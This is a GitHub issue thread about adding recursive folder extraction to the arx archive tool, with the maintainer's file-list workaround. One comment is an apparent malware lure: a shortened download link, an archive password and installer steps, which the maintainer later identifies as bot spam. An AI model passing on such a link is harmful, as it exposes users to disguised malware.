### ISSUE TITLE
[Feature request] Add recursive option to extract

### ISSUE THREAD

**Issue by father-mande** [jubako/arx#43]
Hi,

I try to extract a folder from my archive
if I do : 
**arx extract new_arch New2204/etc/X11/ -C ./temp/**  ... to get all files and folder in my system archive etc/X11
... the result is New2204/etc/X11 empty in ./temp/

**arx extract new_arch New2204/etc/X11/\* -C ./temp/**
... result is all files and folder in New2204/etc/X11/ BUT NOTHING in sub-folders

\# ll -R ./temp/New2204/etc/X11/
./temp/New2204/etc/X11/:
total 68K
drwxr-xr-x    8 root     root        4.0K Aug 27 17:23 ./
drwxr-xr-x    3 root     root        4.0K Aug 27 17:22 ../
-rw-r--r--    1 root     root         709 Aug 27 17:23 Xreset
drwxr-xr-x    2 root     root        4.0K Aug 27 17:23 Xreset.d/
drwxr-xr-x    2 root     root        4.0K Aug 27 17:23 Xresources/
-rw-r--r--    1 root     root        4.0K Aug 27 17:23 Xsession
drwxr-xr-x    2 root     root        4.0K Aug 27 17:23 Xsession.d/
-rw-r--r--    1 root     root         265 Aug 27 17:23 Xsession.options
drwxr-xr-x    2 root     root        4.0K Aug 27 17:23 app-defaults/
-rw-r--r--    1 root     root       17.0K Aug 27 17:23 rgb.txt
drwxr-xr-x    2 root     root        4.0K Aug 27 17:23 xkb/
drwxr-xr-x    2 root     root        4.0K Aug 27 17:23 xorg.conf.d/

./temp/New2204/etc/X11/Xreset.d:
total 8K
drwxr-xr-x    2 root     root        4.0K Aug 27 17:23 ./
drwxr-xr-x    8 root     root        4.0K Aug 27 17:23 ../

./temp/New2204/etc/X11/Xresources:
total 8K
drwxr-xr-x    2 root     root        4.0K Aug 27 17:23 ./
drwxr-xr-x    8 root     root        4.0K Aug 27 17:23 ../

./temp/New2204/etc/X11/Xsession.d:
total 8K
drwxr-xr-x    2 root     root        4.0K Aug 27 17:23 ./
drwxr-xr-x    8 root     root        4.0K Aug 27 17:23 ../
etc. etc. etc.

Even I don't understand clearly :   -L, --file-list <FILE_LIST>  Get the list of files/directories to extract from the FILE_LIST (incompatible with EXTRACT_FILES)

It's must be more useful to be able to get all files and folders using a recursive option in one command (without extra_list) .

Regards.
Philippe.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by mgautierfr** [comment]
Should be fixed by #44

> Even I don't understand clearly : -L, --file-list <FILE_LIST> Get the list of files/directories to extract from the FILE_LIST (incompatible with EXTRACT_FILES)

You can pass a file, containing the list of files you want to extract instead of giving all files in the command line.
For example, a workaround for this issue would have be:

```
$ arx list | grep New2204/etc/X11/ > to_extract.txt
$ arx extract new_arch -L to_extract.txt -C ./temp/
```

**Comment by father-mande** [comment]
Hi,

Thanks for the information ... I have not be sure of this usage due to the "incompatible with EXTRACT_FILES" mention .

I have receive a strange message (here after in a png file to don't resend a problematic message ...
this message seem to come from github arx but target a file with an windows executable and a version of a dll system ???

I always manage this kind of message in a V.M. ... so no problem ...

Philippe.
![arx_mess_strange](https://github.com/user-attachments/assets/47809fe6-6ef8-4191-93ff-d34362d78dff)

**Comment by mgautierfr** [comment]
This is spam. Someone has found a way to send spam comment using bots. This is not related to arx, it seems that all github repositories are impacted. I have remove the comment but github sent you a mail with its content anyway.
